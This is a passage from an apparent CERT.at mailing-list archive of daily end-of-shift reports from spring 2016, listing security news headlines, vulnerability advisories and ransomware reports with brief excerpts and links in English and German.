ransomware called Samsam has been infecting organizations but is not installed in the usual way."Samsam is another variant in a growing number of variants of ransomware, but what sets it apart from other ransomware is how it reaches its intended targets by way of unpatched server-side software," Symantec... --------------------------------------------- http://www.cio.com/article/3052553/server-software-poses-soft-target-for-ra… *** SAP Security - Think Different *** --------------------------------------------- Today we will discuss how SAP Security differs from traditional IT security. While in most cases security is security, no matter what we discuss, in SAP area there are some unique features. First of all, it is the question of responsibility. It's not a secret that SAP is owned and managed by business, which, to... --------------------------------------------- http://resources.infosecinstitute.com/sap-security-think-different/ *** Gpg4win 2.3.1 released *** --------------------------------------------- New in Gpg4win Version 2.3.1 (2015-04-05) - GpgOL now has an option dialog where S/MIME can be disabled. - GpgOL now supports the 64 Bit version of Microsoft Outlook. - ... --------------------------------------------- https://lists.wald.intevation.org/pipermail/gpg4win-announce/2016-April/000… *** Researchers release PoC exploit for broken IBM Java patch *** --------------------------------------------- Polish firm Security Explorations has had enough of broken patches for security vulnerabilities it has reported to vendors. On Monday, the company's CEO Adam Gowdiak has published on the Full Disclosure mailing list the technical details and PoC code for exploiting a security issue in IBM Java that has been poorly patched by the vendor. The flaw was discovered by Security Explorations researchers in early 2013. This is the 6th instance of a broken patch... --------------------------------------------- https://www.helpnetsecurity.com/2016/04/06/broken-ibm-java-patch/ *** AdLoad: an advertisement bombarder *** --------------------------------------------- The AdLoad PUP is an infection that presents its victims with a great variation of advertisements, fake alerts, dubious offers, and even other PUPs. It targets users by location and OS.Categories: PUPs Threat analysisTags: adloadadvertisementfake alertMalwarebytesPieter ArntzPUPscam(Read more...) --------------------------------------------- https://blog.malwarebytes.org/threat-analysis/2016/04/adload-an-advertiseme… *** FBI Warns of Dramatic Increase in Business E-Mail Scams *** --------------------------------------------- FBI officials are warning potential victims of a dramatic rise in the business e-mail compromise scam or "B.E.C.", [...] Law enforcement globally has received complaints from victims in every U.S. state and in at least 79 countries. [...] This amounted to more than $2.3 billion in losses. --------------------------------------------- https://www.fbi.gov/phoenix/press-releases/2016/fbi-warns-of-dramatic-incre… *** Crypto ransomware targets called by name in spear-phishing blast *** --------------------------------------------- Once the domain of espionage, personalized scams embraced by profit-driven scammers. --------------------------------------------- http://arstechnica.com/security/2016/04/crypto-ransomware-targets-called-by… *** CONIKS *** --------------------------------------------- CONIKS is an new easy-to-use transparent key-management system: CONIKS is a key management system for end users capable of integration in end-to-end secure communication services. The main idea is that users should not have to worry about managing encryption keys when they want to communicate securely, but they also should not have to trust their secure communication service providers to... --------------------------------------------- https://www.schneier.com/blog/archives/2016/04/coniks.html *** DeepSec 2015 Videos (Youtube Playlist) *** --------------------------------------------- DeepSec 2015 IN-DEPTH SECURITY CONFERENCE - 17th to 20th November 2015 The Imperial Riding School Vienna, Austria --------------------------------------------- https://www.youtube.com/playlist?list=PLBA0WdWrcrCHpBtNgK-H64_S6-xBpzILR *** ICS/SCADA Threat Intelligence Sharing Portal (March 31, 2016) *** --------------------------------------------- The EastWest Institute and the US Department of Homeland Securitys ICS-CERT have launched a portal for operators of critical infrastructure around the world to share threat information... --------------------------------------------- http://www.sans.org/newsletters/newsbites/r/18/27/308 *** Von Moorhühnern, Autounfällen und veralteter Software *** --------------------------------------------- Peter fährt mit seinem Auto für dessen tourliche Untersuchung auf Fahrtüchtigkeit - kurz, Pickerl - zu seiner vertrauten Autowerkstatt. Nach rund einer halben Stunde sagt ihm der Mechaniker, dass die Bremsleitungen seines Autos stark korrodiert seien und es nur noch eine Frage der Zeit wäre, bis diese platzen und es folglich zu einem Ausfall der Bremsen käme. Peter schluckt: "Na, da hab ich... --------------------------------------------- http://www.cert.at/services/blog/20160406112228-1706.html *** VLC Media Player Buffer Overflow in Processing WAV Files Lets Remote Users Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1035456 *** Security Advisory: Java vulnerabilities CVE-2016-4066 and CVE-2016-0483 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/50/sol50118123.html?… *** DSA-3542 mercurial - security update *** --------------------------------------------- Several vulnerabilities have been discovered in Mercurial, a distributedversion control system. The Common Vulnerabilities and Exposures projectidentifies the following issues: --------------------------------------------- https://www.debian.org/security/2016/dsa-3542 *** DFN-CERT-2016-0556: Red Hat JBoss Enterprise Application Platform: Zwei Schwachstellen ermöglichen einen Denial-of-Service-Angriff *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0556/ *** Pro-face GP-Pro EX HMI Vulnerabilities *** --------------------------------------------- This advisory contains mitigation details for hard-coded credentials in Pro-face's GP-Pro EX HMI software. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-096-01 *** Eaton Lighting Systems EG2 Web Control Authentication Bypass Vulnerabilities *** --------------------------------------------- This advisory was originally posted to the US-CERT secure Portal library on March 1, 2016, and is being released to the NCCIC/ICS-CERT web site. This advisory contains mitigation details for vulnerabilities in Eaton Lighting Systems' EG2 Web Control application. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-061-03 *** Rockwell Automation Integrated Architecture Builder Access Violation Memory Error *** --------------------------------------------- This advisory was originally posted to the US-CERT secure Portal library on February 25, 2016, and is being released to the NCCIC/ICS-CERT web site. This advisory contains mitigation details for an access violation memory error in Rockwell Automation's Integrated Architecture Builder application. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-056-01 *** Bugtraq: op5 v7.1.9 Remote Command Execution *** --------------------------------------------- http://www.securityfocus.com/archive/1/537992 *** Bugtraq: CA20160405-01: Security Notice for CA API Gateway *** --------------------------------------------- http://www.securityfocus.com/archive/1/537991 *** [HTB23286]: SQL Injection in SocialEngine *** --------------------------------------------- Product: SocialEngine v4.8.9Vulnerability Type: SQL Injection [CWE-89]Risk level: High Creater: WebligoAdvisory Publication: December 21, 2015 [without technical details]Public Disclosure: April 6, 2016 CVE Reference: Pending CVSSv2 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L] Vulnerability Details: High-Tech Bridge Security Research Lab discovered SQL-Injection vulnerability in a popular social networking software SocialEngine. The vulnerability can be exploited to gain --------------------------------------------- https://www.htbridge.com/advisory/HTB23286 *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in Samba affect IBM i *** http://www.ibm.com/support/docview.wss?uid=nas8N1021200 --------------------------------------------- *** IBM Security Bulletin: IBM TRIRIGA Application Platform Privilege Escalation (CVE-2016-0342) *** http://www.ibm.com/support/docview.wss?uid=swg21980252 --------------------------------------------- *** IBM Security Bulletin: IBM TRIRIGA Application Platform Cross Site Request Forgery Vulnerability (CVE-2016-0346) *** http://www.ibm.com/support/docview.wss?uid=swg21980237 --------------------------------------------- *** IBM Security Bulletin: IBM TRIRIGA Application Platform Information disclosure (CVE-2016-0345) *** http://www.ibm.com/support/docview.wss?uid=swg21980233 --------------------------------------------- *** IBM Security Bulletin: IBM TRIRIGA Application Platform Information Disclosure (CVE-2016-0343) *** http://www.ibm.com/support/docview.wss?uid=swg21980229 --------------------------------------------- *** IBM Unauthenticated access to information in IBM TRIRIGA Application Platform (CVE-2016-0312) *** http://www.ibm.com/support/docview.wss?uid=swg21979762 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in OpenSSL affects IBM BigFix Remote Control and IBM Endpoint Manager for Remote Control (CVE-2015-3194) *** http://www.ibm.com/support/docview.wss?uid=swg21978415 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in OpenSSL affects IBM Tivoli Composite Application Manager for Transactions (CVE-2016-0705, CVE-2016-0798, CVE-2016-0797, CVE-2016-0799, CVE-2016-0702) *** http://www.ibm.com/support/docview.wss?uid=swg21978869 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Tivoli Network Manager IP Edition 3.9 Fix Pack 4. *** http://www.ibm.com/support/docview.wss?uid=swg21978941 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM MQ Appliance *** http://www.ibm.com/support/docview.wss?uid=swg21979829 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM MessageSight (CVE-2016-0800, CVE-2016-0705 and CVE-2016-0797) *** http://www.ibm.com/support/docview.wss?uid=swg21980451 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Netezza Host Management *** http://www.ibm.com/support/docview.wss?uid=swg21979983 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect Tivoli Workload Scheduler (CVE-2016-0705, CVE-2016-0702, CVE-2016-0800, CVE-2016-0701) *** http://www.ibm.com/support/docview.wss?uid=swg21979602 --------------------------------------------- *** IBM Security Bulletin: Security Bulletin: Multiple vulnerabilities in OpenSSL affect Tivoli Provisioning Manager for OS Deployment, Tivoli Provisioning Manager for Images *** http://www.ibm.com/support/docview.wss?uid=swg21979311 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Sterling Connect:Express for UNIX (CVE-2016-0800, CVE-2016-0705, CVE-2016-0798, CVE-2016-0797, CVE-2016-0799, CVE-2016-0702, CVE-2016-0703, CVE-2016-0704) *** http://www.ibm.com/support/docview.wss?uid=swg21978489 ---------------------------------------------

1 0

Tageszusammenfassung - Dienstag 5-04-2016
by Daily end-of-shift report 05 Apr '16

05 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Montag 04-04-2016 18:00 − Dienstag 05-04-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Chrome Extension Caught Hijacking Users Browsers *** --------------------------------------------- An anonymous reader writes: Google has intervened and banned the Better History Chrome extension from the Chrome Web Store after users reported that it started taking over their browsing experience and redirecting them to pages showing ads. As it turns out, the extension was sold off to an unnamed buyer who started adding malicious code that would redirect the users traffic through a proxy, showing ads and collecting analytics on the users traffic habits. This same malicious code has also been... --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/4tdNNvCWAQs/chrome-extensio… *** Microsoft account-hijacking hole closed 48 hours after bug report *** --------------------------------------------- Token-harvesting attack meant one login could open doors to multiple Microsoft services British researcher Jack Whitton has reported a Microsoft account hijacking authentication bug that would have been another arrow in an attackers phishing quiver, save for the fact that Microsoft fixed it. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/04/05/microsoft_b… *** Sicherheitslücken: Angreifer können Open-Xchange Code unterjubeln *** --------------------------------------------- In Open-Xchange klaffen zwei Schwachstellen, über die Kriminelle im schlimmsten Fall Sessions kapern können. Sicherheitspatches wurden bereits verteilt. --------------------------------------------- http://heise.de/-3162127 *** Update your ManageEngine Password Manager Pro ASAP! *** --------------------------------------------- Security researcher Sebastian Perez has revealed eight serious security vulnerabilities in ManageEngine Password Manager Pro (PMP), a password management software for enterprises, and has released details and PoC code for each of them. The solution has already been updated with fixes, so if your enterprise is using it to control the access to shared administrative/privileged passwords, you should update to the latest version and build (v8.3, build 8303) as soon as possible (if you haven't... --------------------------------------------- https://www.helpnetsecurity.com/2016/04/05/update-manageengine-password-man… *** One Conference 2016 Protecting Bits and Atoms: Cyber security is a precondition for our future *** --------------------------------------------- Cyber security, and therefore being able to use all the possibilities that ICT offers, is a precondition for the undisturbed functioning of society and for our future. With these words, State secretary Dijkhoff (Security and Justice) emphasizes the importance of the international One Conference 2016 of the National Cyber Security Center (NCSC). We cant be passive on what is to come. The speed of the developments in the digital domain require a continuous effort of both public and private... --------------------------------------------- https://www.ncsc.nl/english/current-topics/news/one-conference-2016-protect… *** Firefox Add-On Flaw Leaves Apple And Windows Computers Open To Attack *** --------------------------------------------- Researchers say reliance on an outdated Firefox extension platform opens the door for remote system attacks on Mac OS and Windows systems. --------------------------------------------- http://threatpost.com/firefox-add-on-flaw-leaves-apple-and-windows-computer… *** Keep Windows machines infected abusing Windows Desired State Configuration (DSC) *** --------------------------------------------- Two forensics experts have demonstrated how to abuse the Windows Desired State Configuration (DSC) feature to gain persistence on the compromised machine. At the last Black Hat Asia, the forensics experts Matt Hastings and Ryan Kazanciyan from Tanium have demonstrated how to abuse the Windows Desired State Configuration (DSC) feature to gain persistence on the compromised machine. The DSC... --------------------------------------------- http://securityaffairs.co/wordpress/46006/hacking/abusing-windows-dsc.html *** Complete Tour of PE and ELF: Part 4 *** --------------------------------------------- Since we have completed the PE structure, now it is time to look at the ELF structure which is somewhat easier to understand as compared to PE. For ELF structure, we will be looking at both the linking view and execution view of a binary. Sections are similar to what we saw in PE structure... --------------------------------------------- http://resources.infosecinstitute.com/complete-tour-of-pe-and-elf-part-4/ *** Passwort-Test von CNBC: Unverschlüsselt und unverantwortlich *** --------------------------------------------- In einem Artikel des Nachrichtensenders CNBC konnten Leser die Sicherheit ihrer Kennwörter testen. Was kann dabei schon schiefgehen? Eine ganze Menge, wie Sicherheitsforscher aufzeigen. --------------------------------------------- http://heise.de/-3162731 *** Google fixes 39 Android flaws, some allow hackers to take over your phone *** --------------------------------------------- Google has released one of the largest Android monthly security updates, fixing a total of 39 vulnerabilities - 15 rated critical, including four that can lead to a complete device compromise.The patches, which are included in new firmware images that were released Monday for the companys Nexus devices, will also be published to the Android Open Source Project over the next 24 hours.They include a fix for a vulnerability that Google warned about two weeks ago and which is already being... --------------------------------------------- http://www.cio.com/article/3052201/google-fixes-39-android-flaws-some-allow… *** About the security content of iOS 9.3 *** --------------------------------------------- This document describes the security content of iOS 9.3. --------------------------------------------- https://support.apple.com/en-us/HT206166 *** DFN-CERT-2016-0548: BlackBerry powered by Android: Mehrere Schwachstellen ermöglichen u.a. die Ausführung beliebigen Programmcodes *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0548/ *** DFN-CERT-2016-0549: Google Android Operating System: Mehrere Schwachstellen ermöglichen u.a. das Erlangen von Administratorrechten *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0549/ *** Sophos Cyberoam NG Series Multiple Cross-Site Scripting Vulnerabilities *** --------------------------------------------- Multiple reflected XSS issues were discovered in Cyberoam NG appliances. Input passed via the ipFamily, applicationname and username GET parameters to LiveConnections.jsp and LiveConnectionDetail.jsp is not properly sanitised before being returned to the user. Adding arbitrary X-Forwarded-For HTTP header to a request makes the appliance also prone to a XSS issue. This can be exploited to execute arbitrary HTML and script code in a users browser session in context of an affected site. --------------------------------------------- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5313.php *** DSA-3541 roundcube - security update *** --------------------------------------------- High-Tech Bridge Security Research Lab discovered that Roundcube, awebmail client, contained a path traversal vulnerability. This flawcould be exploited by an attacker to access sensitive files on theserver, or even execute arbitrary code. --------------------------------------------- https://www.debian.org/security/2016/dsa-3541 *** USN-2945-1: XChat-GNOME vulnerability *** --------------------------------------------- Ubuntu Security Notice USN-2945-14th April, 2016xchat-gnome vulnerabilityA security issue affects these releases of Ubuntu and its derivatives: Ubuntu 15.10 Ubuntu 14.04 LTS Ubuntu 12.04 LTSSummaryXChat-GNOME could be made to expose sensitive information over the network.Software description xchat-gnome - simple and featureful IRC client for GNOME DetailsIt was discovered that XChat-GNOME incorrectly verified the hostname in anSSL certificate. An attacker could trick XChat-GNOME into trusting... --------------------------------------------- http://www.ubuntu.com/usn/usn-2945-1/ *** USN-2944-1: Libav vulnerabilities *** --------------------------------------------- Ubuntu Security Notice USN-2944-14th April, 2016libav vulnerabilitiesA security issue affects these releases of Ubuntu and its derivatives: Ubuntu 12.04 LTSSummaryLibav could be made to crash or run programs as your login if it opened aspecially crafted file.Software description libav - Multimedia player, server, encoder and transcoder DetailsIt was discovered that Libav incorrectly handled certain malformed mediafiles. If a user were tricked into opening a crafted media file, anattacker could... --------------------------------------------- http://www.ubuntu.com/usn/usn-2944-1/ *** Bugtraq: [SE-2012-01] Broken security fix in IBM Java 7/8 *** --------------------------------------------- http://www.securityfocus.com/archive/1/537973 *** Open-Xchange Input Validation Flaws Let Remote Conduct Cross-Site Scripting Attacks *** --------------------------------------------- http://www.securitytracker.com/id/1035469 *** Bugtraq: [security bulletin] HPSBGN03569 rev.1 - HPE OneView for VMware vCenter (OV4VC), Remote Disclosure of Information *** --------------------------------------------- http://www.securityfocus.com/archive/1/537977

1 0

Tageszusammenfassung - Montag 4-04-2016
by Daily end-of-shift report 04 Apr '16

04 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 01-04-2016 18:00 − Montag 04-04-2016 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl Co-Handler: Stephan Richter *** SideStepper vulnerability in iOS 9 endangers companies that use MDM to distribute apps *** --------------------------------------------- Researchers are warning companies that the use of MDM technology opens up a loophole in protections added to Apples iOS 9 to help prevent employees from downloading malicious software posing as legit enterprise apps. --------------------------------------------- http://www.scmagazine.com/sidestepper-vulnerability-in-ios-9-endangers-comp… *** Analysis of the Locky infection process *** --------------------------------------------- In recent months, there has been a significant increase in the number of networks and users affected by ransomware known as Locky, which is used to encrypt a victim's files and then demand a ransom to be paid in bitcoins. But, how does this threat manage to infiltrate computer systems and hijack data? From the ESET Research Lab in Latin America, we can explain the steps and the methods used by cybercriminals to evade various layers of security. --------------------------------------------- http://www.welivesecurity.com/2016/04/04/analysis-of-the-locky-infection-pr… *** PayPal plugs phishing-enabling vulnerability, stumps up $500 *** --------------------------------------------- To the bug-splatter who found it. Not to you, dont get excited PayPal has patched a flaw which created a means for miscreants to abuse its platform to lend authenticity to fraudulent or otherwise malicious emails. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/04/01/paypal_plug… *** Steam hacker says more vulnerabilities will be found, but not by him *** --------------------------------------------- "It looks like their website hasnt been updated for years." --------------------------------------------- http://arstechnica.com/gaming/2016/04/steam-hacker-says-more-vulnerabilitie… *** New Heap-Spray Exploit Tied To LZH Archive Decompression *** --------------------------------------------- Researchers found a vulnerability in the classic compression standard Lhasa, once a mainstay for game developers in the mid-90s and still in use today. --------------------------------------------- http://threatpost.com/new-heap-spray-exploit-tied-to-lzh-archive-decompress… *** Magento e-commerce platform targeted with new ransomware KimcilWare *** --------------------------------------------- Users of the Magento e-commerce platform are being targeted with a new ransomware called KimcilWare. --------------------------------------------- http://www.scmagazine.com/magento-e-commerce-platform-targeted-with-new-ran… *** Magnitude EK Malvertising Campaign Adds Fingerprinting Gate *** --------------------------------------------- Threat actors refine a malvertising campaign leading to Magnitude EK.Categories: Cybercrime ExploitsTags: fingerprintingMagnitudemalvertising(Read more...) --------------------------------------------- https://blog.malwarebytes.org/cybercrime/2016/04/magnitude-ek-malvertising-… *** Continuous Integration: Jenkins sendet versehentlich anonyme Nutzungsdaten *** --------------------------------------------- Ein Bug in den Jenkins-Versionen 1.645 und 1.642.2 ignoriert die Einstellung zum Senden der Nutzungsstatistik. Ein Update soll das Problem beheben. Alternativ geben die Macher Tipps zur manuellen Abhilfe. --------------------------------------------- http://heise.de/-3161093 *** "Experience is a good school. But the fees are high." ENISA urges decision makers to take action before a major cyber crisis occurs in Europe *** --------------------------------------------- ENISA analysed the EU-level crisis management frameworks in five different sectors to make recommendations on more efficient cyber crisis cooperation and management. The report resulting from this study highlights the lessons that can be learnt from other sectors and that could be applicable in the cyber domain. The study concludes with a series of recommendations regarding EU-level priorities to alter the impact of potential cyber crises. More recently ENISA published a video related to this study that summarises the conclusions based on testimonials from experts in other sectors. --------------------------------------------- https://www.enisa.europa.eu/media/press-releases/201cexperience-is-a-good-s… *** Multiple vulnerabilities found in Quanta LTE routers (backdoor, backdoor accounts, RCE, weak WPS ...) *** --------------------------------------------- The Quanta LTE QDH Router device is a LTE router / access point overall badly designed with a lot of vulnerabilities. Its available in a number of countries to provide Internet with a LTE network. --------------------------------------------- https://pierrekim.github.io/blog/2016-04-04-quanta-lte-routers-vulnerabilit… *** Analysis of the Procedure of Penetration on a Hacked Host *** --------------------------------------------- On the morning of 14th, a colleague of mine reported that the CPU usage of a host reached up to 100%. Then Security Department embarked on investigation and concluded the followings:... --------------------------------------------- http://en.wooyun.io/2016/03/29/48.html *** Binärdateien vergleichen: BinDiff ab sofort (fast) gratis nutzen *** --------------------------------------------- Entwickler und Sicherheitsforscher können das Tool BinDiff zum Vergleichen von Binärdateien kostenlos herunterladen. Für die Nutzung ist aber ein kostenpflichtiger Disassembler nötig. --------------------------------------------- http://heise.de/-3161798 *** How Reporters Pulled Off the Panama Papers, the Biggest Leak in Whistleblower History *** --------------------------------------------- The 2.6 terabyte Panama Papers may be the first leak of their scale, but they wont be the last. --------------------------------------------- http://www.wired.com/2016/04/reporters-pulled-off-panama-papers-biggest-lea… *** DFN-CERT-2016-0539: Squid: Zwei Schwachstellen ermöglichen u.a. verschiedene Denial-of-Service-Angriffe *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0539/ *** DSA-3539 srtp - security update *** --------------------------------------------- Randell Jesup and the Firefox team discovered that srtp, Ciscosreference implementation of the Secure Real-time Transport Protocol(SRTP), does not properly handle RTP header CSRC count and extensionheader length. A remote attacker can exploit this vulnerability to crashan application linked against libsrtp, resulting in a denial of service. --------------------------------------------- https://www.debian.org/security/2016/dsa-3539 *** DSA-3540 lhasa - security update *** --------------------------------------------- Marcin Noga discovered an integer underflow in Lhasa, a lzh archivedecompressor, which might result in the execution of arbitrary code ifa malformed archive is processed. --------------------------------------------- https://www.debian.org/security/2016/dsa-3540 *** Bugtraq: FortiManager & FortiAnalyzer 5.x (Appliance Application) - (filename) Persistent Web Vulnerability *** --------------------------------------------- http://www.securityfocus.com/archive/1/537967 *** Bugtraq: ManageEngine Password Manager Pro Multiple Vulnerabilities *** --------------------------------------------- http://www.securityfocus.com/archive/1/537969

1 0

Tageszusammenfassung - Freitag 1-04-2016
by Daily end-of-shift report 01 Apr '16

01 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 31-03-2016 18:00 − Freitag 01-04-2016 18:00 Handler: Robert Waldner Co-Handler: n/a *** ICONICS WebHMI Directory Traversal Vulnerability *** --------------------------------------------- This advisory contains mitigation details for a directory traversal vulnerability in the ICONICS WebHMI V9 application. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-091-01 *** Beware of Unverified TLS Certificates in PHP & Python *** --------------------------------------------- Web developers today rely on various third-party APIs. For example, these APIs allow you to accept credit card payments, integrate a social network with your website, or clear your CDN's cache. The HTTPS protocol is used to secure the connection with the API server. However, if your web app doesn't verify the TLS certificate, aRead More The post Beware of Unverified TLS Certificates in PHP & Python appeared first on Sucuri Blog. --------------------------------------------- https://blog.sucuri.net/2016/03/beware-unverified-tls-certificates-php-pyth… *** TA16-091A: Ransomware and Recent Variants *** --------------------------------------------- In early 2016, destructive ransomware variants such as Locky and Samas were observed infecting computers belonging to individuals and businesses, which included healthcare facilities and hospitals worldwide. Ransomware is a type of malicious software that infects a computer and restricts users' access to it until a ransom is paid to unlock it. --------------------------------------------- https://www.us-cert.gov/ncas/alerts/TA16-091A *** How To Build Your Own Rogue GSM BTS For Fun And Profit *** --------------------------------------------- In this blog post Im going to explain how to create a portable GSM BTS which can be used either to create a private ( and vendor free! ) GSM network or for GSM active tapping/interception/hijacking ... yes, with some (relatively) cheap electronic equipment you can basically build something very similar to what the governments are using from years to perform GSM interception. --------------------------------------------- https://evilsocket.net/2016/03/31/how-to-build-your-own-rogue-gsm-bts-for-f… *** About the security content of iBooks Author 2.4.1 *** --------------------------------------------- Available for: OS X Yosemite v10.10 or later Impact: Parsing a maliciously crafted iBooks Author file may lead to disclosure of user information Description: An XML external entity reference issue existed with iBook Author parsing. This issue was addressed through improved parsing. CVE-ID CVE-2016-1789 --------------------------------------------- https://support.apple.com/en-us/HT206224 *** Security: Apples Rootless-Konzept hat erhebliche Mängel *** --------------------------------------------- Apples Sicherheitsmechanismus Rootless soll verhindern, dass mit Rootrechten Systemdateien verändert werden können. Doch er lässt sich leicht austricksen und Apple scheint es nicht eilig zu haben, die Lücken zu schließen. --------------------------------------------- http://www.golem.de/news/security-apples-rootless-konzept-hat-erhebliche-ma… *** WebKitGTK+ Security Advisory WSA-2016-0003 *** --------------------------------------------- Several vulnerabilities were discovered in WebKitGTK+. CVE identifiers: CVE-2016-1778, CVE-2016-1779, CVE-2016-1781, CVE-2016-1782, CVE-2016-1783, CVE-2016-1785, CVE-2016-1786. --------------------------------------------- http://webkitgtk.org/security/WSA-2016-0003.html *** DFN-CERT-2016-0530 - PostgreSQL: Zwei Schwachstellen ermöglichen u.a. das Ausspähen von Informationen *** --------------------------------------------- Zwei Schwachstellen in PostgreSQL ermöglichen einem entfernten, einfach authentifizierten Angreifer das Ausspähen von Informationen, das Durchführen von Denial-of-Service-Angriffen sowie das Umgehen von Sicherheitsvorkehrungen und in der Folge die Manipulation von Daten. Die PostgreSQL Global Development Group stellt ein Sicherheitsupdate auf die Version 9.5.2 bereit, um die Schwachstellen zu beheben. --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0530/ *** New Ransomware KimcilWare Targets Magento Websites *** --------------------------------------------- Ransomware dubbed KimcilWare is targeting websites running the e-commerce platform Magento and encrypting website files. --------------------------------------------- http://threatpost.com/new-ransomware-kimcilware-targets-magento-websites/11…

1 0

Tageszusammenfassung - Donnerstag 31-03-2016
by Daily end-of-shift report 31 Mar '16

31 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 30-03-2016 18:00 − Donnerstag 31-03-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Auch Google sollte für US-Behörden Smartphones entsperren *** --------------------------------------------- Alles dreht sich im aktuellen Streit um gesperrte Smartphones von mutmaßlichen Straftätern um Apple und das FBI - US-Behörden haben aber auch an Google zahlreiche derartiger Aufforderungen verschickt. Das hat die Bürgerrechtsvereinigung ACLU herausgefunden. --------------------------------------------- http://www.golem.de/news/nicht-nur-apple-auch-google-sollte-fuer-us-behoerd… *** Lücke bei SAP-Software: Hunderttausende Unternehmen gefährdet *** --------------------------------------------- Deutsche Behörden stufen die Mängel als "kritisch" ein, erst seit Oktober behoben --------------------------------------------- http://derstandard.at/2000033938536 *** Trend-Micro-Produkte öffneten triviale Hintertür *** --------------------------------------------- Antiviren-Software soll das System vor bösartiger Software schützen. Immer öfter stellt sich jedoch heraus, dass sie selbst als Einfallstor dienen kann. Ein Sicherheitsexperte demonstriert das zum wiederholten Mal mit Trend Micros Security-Produkten. --------------------------------------------- http://heise.de/-3159436 *** Automatisierte Medikamenten-Verteiler mit über 1400 Sicherheitslücken *** --------------------------------------------- Veraltete SupplyStation-Systeme sind nach wie vor in Krankenhäusern im Einsatz und haben tausende Sicherheitslücken. Das ICS-CERT in den USA warnt deswegen vor dem Sicherheitsrisiko durch diese Medikamenten-Verteiler. --------------------------------------------- http://heise.de/-3159439 *** Snort Covert Channels *** --------------------------------------------- Lab 3: Covert Channels Covert channels are used by outside attackers to establish communications with the compromised system, or by malicious insiders to secretly transfer data to unauthorized locations. There are various implementations .. --------------------------------------------- http://resources.infosecinstitute.com/snort-covert-channels/ *** Security best practices for git users *** --------------------------------------------- In recent years git has become one of most popular SCM/Version Control systems. Usage in some high-profile open-source projects like Linux or Raspberry Pi and support from vendors like GitHub and GitLab definitively helped to gain fame. As .. --------------------------------------------- http://resources.infosecinstitute.com/security-best-practices-for-git-users/ *** PowerWare 'Fileless Infection' Deepens Ransomware Conundrum for Healthcare Providers *** --------------------------------------------- The recent wave of ransomware attacks on healthcare institutions is not only raising questions about contingency planning, but also about whether healthcare is becoming the 'go-to' target for cyber extortionists looking to make quick .. --------------------------------------------- https://www.alienvault.com/blogs/security-essentials/powerware-fileless-inf… *** DFN-CERT PGP-Schlüssel *** --------------------------------------------- https://www.dfn-cert.de/aktuell/dfn-cert-schluessel.html *** Cisco Firepower Malware Block Bypass Vulnerability *** --------------------------------------------- A vulnerability in the malicious file detection and blocking features of Cisco Firepower System Software could allow an unauthenticated, remote attacker to bypass malware detection mechanisms on an affected system. --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… *** Let Me Get That Door for You: Remote Root Vulnerability in HID Door Controllers *** --------------------------------------------- If you've ever been inside an airport, university campus, hospital, government complex, or office building, you've probably seen one of HID's brand of card readers standing guard over a restricted area. HID is one of the world's largest .. --------------------------------------------- http://blog.trendmicro.com/let-get-door-remote-root-vulnerability-hid-door-… *** The Linux Remaiten malware is building a Botnet of IoT devices *** --------------------------------------------- Experts from the ESET firm have spotted a new threat in the wild dubbed Remaiten that targets embedded systems to recruit them in a botnet. ESET is actively monitoring malicious codes that target IoT systems such as routers, gateways .. --------------------------------------------- http://securityaffairs.co/wordpress/45820/iot/linux-remaiten-iot-botnet.html *** Ransomware Petya - a technical review *** --------------------------------------------- In March 24, researchers at G DATA received a sample of a new type of ransomware which was dubbed 'Petya'. Unlike other types of ransomware, Petya prevents the operating system from starting by manipulating the MBR and installing its own .. --------------------------------------------- https://blog.gdatasoftware.com/2016/03/28226-ransomware-petya-a-technical-r…

1 0

Tageszusammenfassung - Mittwoch 30-03-2016
by Daily end-of-shift report 30 Mar '16

30 Mar '16

